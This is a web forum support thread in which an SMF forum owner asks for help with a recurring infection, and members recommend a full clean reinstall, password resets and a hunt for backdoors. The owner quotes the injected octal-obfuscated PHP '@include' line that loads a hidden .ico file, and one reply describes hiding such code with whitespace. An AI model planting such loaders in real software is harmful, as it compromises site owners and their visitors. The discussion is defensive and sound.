hacked help

[bynw]

I have a second problem. I have been hacked. I am finding new index.php files with code such as:

Code Select Expand


<?php
/*bea04*/

@include "\057hom\145/ma\162ikp\156d/r\150emu\164hca\163tle\056com\057sed\151na/\160hot\157gal\154ery\057pho\164o00\060108\0670/.\142fdc\145ecb\056ico";

/*bea04*/


This sometimes is the only code in the index.php file or the proper index.php file has this coded added to the top. I've changed database name/password. I have moved the site to another server. Yet this code keeps showing up. No matter what I do. Is it somewhere in the database then?

How can I get rid of it. Maybe my other issue will go away after that. I haven't tried replacing any files that have been modified only editing out the extra incorrect code and then deleting any of those extra index.php files from directories.

Also if a directory had an index.htm(l) file it gets renamed to index.htm(l).bak.bak

[vbgamer45]

Best bet is copy all your files backup the files,

Then do a clean install of SMF.


If you run other scripts such as wordpress that can also be the source of the infection.

[Sir Osis of Liver]

Backup your database and files, delete ALL files in forum directory, upload clean set of files, upload Settings.php and Settings_bak.php from backup, reinstall mods and themes.  The hack can be in multiple files/directories and reinstalls itself when you clean up index.php.

[Looking]

Besides the files you need to also make sure:

DB has not been compromised with inserted code that can be brought back up.
Strange accounts on DB that may have unauthorized privileges,
Host security. For instance, versions of software, firewall, shared resources, etc.

[Illori]

https://wiki.simplemachines.org/smf/How_to_upload_a_fresh_set_of_files

make sure you reset all your passwords associated with your hosting.

[Doug Heffernan]

What version of Smf do you have? This looks like a case of server being compromised. Bring your host up to date on this too. ANother thing that I would be looking for are backdoors.

[bynw]

I'm using 2.0.17

I cleaned up the files that were modified. At least that I could tell were modified. And moved it to another host. Fortunately I have more than one available. After moving it that did change the database name/password. FTP information all got changed.

But again I discovered the modified files. So I am really thing something in the database itself has been compromised since I transferred that to the new host as well.

I'm going to try the fresh install and see what happens. Wish I knew what to look for in the database to see if there is any malicious code there hiding.

[Kindred]

if you moved the entire contents and only "cleaned" files which you THOUGHT were compromised, then chances are yo actually missed the installed back door.

Usually, once they get in, they will put an actual back door buried 23 directories deep.

That's why you were asked to DELETE EVERYTHING, put back a KNOWN CLEAN copy of SMF than then restore specific files/directories as you confirm that they are not compromised.

[Doug Heffernan]

I'm using 2.0.17

I'm going to try the fresh install and see what happens. Wish I knew what to look for in the database to see if there is any malicious code there hiding.

The hidden malicious code a.k.a the backdoor, is going to be in the forum folder and not in the database.

[Sir Osis of Liver]

Cleaned up a couple of hacks where all index.php files in all subdirectories were infected, as were multiple source files.  You're not going to fix this by nitpicking files.  Once the files are clean, then you can worry about the database, but don't think that will be necessary.

[Arantor]

I would assume every single PHP file is infected, not just index.php ones.

I've seen some sneaky ones over the years, like embedding themselves on the very first line (the <?php line) with a lot of spaces so that in a normal editor you wouldn't see the code because the spaces pushed it to the right.

If you're not going to start with what the industry calls 'nuke and pave', the very first step must be to contain infection by making all files and folders read-only so nothing can be altered without you doing it.

[Bobby]

You should:
1. Backup your database
2. Delete all files and folders in public_html/www folder
3. Upload the clean SMF2.1 RC2 to public_html/www folder
4. Run upgrade.php
Good luck!

[Kindred]

You should:
1. Backup your database
2. Delete all files and folders in public_html/www folder
3. Upload the clean SMF2.1 RC2 to public_html/www folder
4. Run upgrade.php
Good luck!

no....    this is wrong


first and foremost - he needs to back up the FILES as well, otherwise he'll lose all attachments and avatars.


We've told him.

Backup (database and files)
delete all files and directories other than Settings.php
load clean files from upgrade archive
(no need to run upgrade.php)
Reset all users to the default theme
then restore the contents of avatars and attachments as contents are confirmed to be clean.
re-install custom theme from scratch
re-install mods from scratch

[Bobby]

You should:
1. Backup your database
2. Delete all files and folders in public_html/www folder
3. Upload the clean SMF2.1 RC2 to public_html/www folder
4. Run upgrade.php
Good luck!

no....    this is wrong


first and foremost - he needs to back up the FILES as well, otherwise he'll lose all attachments and avatars.


We've told him.

Backup (database and files)
delete all files and directories other than Settings.php
load clean files from upgrade archive
(no need to run upgrade.php)
Reset all users to the default theme
then restore the contents of avatars and attachments as contents are confirmed to be clean.
re-install custom theme from scratch
re-install mods from scratch

Oh yes, i forgot something, should delete everything in public_html except attachments, avatars folder and the old Settings.php file, then run upgrade.php! That maybe a simple way!

[Kindred]

no no no no...

there is no need to run upgrade.php.
The OP is not upgrading anything.



See my steps.
follow my steps.

[Chen Zhen]

The code you posted is actually this (I Xed out the initial path):

Code Select Expand

@include "/XXXX/XXXX/XXXX.com/sedina/photogallery/photo00010870/.bfdceecb.ico";

Did you attempt to install some sort of 3rd party photo gallery?

[Arantor]

That looks to me like something masquerading as a legitimate URL to smuggle in something not legitimate. Common tactic.

[bynw]

The code you posted is actually this (I Xed out the initial path):

Code Select Expand

@include "/XXXX/XXXX/XXXX.com/sedina/photogallery/photo00010870/.bfdceecb.ico";

Did you attempt to install some sort of 3rd party photo gallery?

No that was just a folder that was linked to off the forum. Not integrated into it. No PHP files at all. I dont see that .ico file in the backup though.

[Chen Zhen]

You seem to be at the point of a fresh SMF upgrade for the moment.

When you reinstall your portal, make sure it is the most recent version and also disable any PHP blocks.
If you have any member that has portal admin access or any kind of admin access, temporarily suspend that access.
Any access to writing PHP blocks will allow someone to do what they want to your forum directory.

Do you have any 3rd party scripts that are not part of SMF?
Like some sort of chat or game that runs off of a child path of your SMF forum?

[bynw]

You seem to be at the point of a fresh SMF upgrade for the moment.

When you reinstall your portal, make sure it is the most recent version and also disable any PHP blocks.
If you have any member that has portal admin access or any kind of admin access, temporarily suspend that access.
Any access to writing PHP blocks will allow someone to do what they want to your forum directory.

Do you have any 3rd party scripts that are not part of SMF?
Like some sort of chat or game that runs off of a child path of your SMF forum?

I don't think I had PHP blocks on the portal. And didn't see anything when I just now reinstalled it. I'm not using any of the articles features on the portal. Just some side blocks.

The only mods came from SMF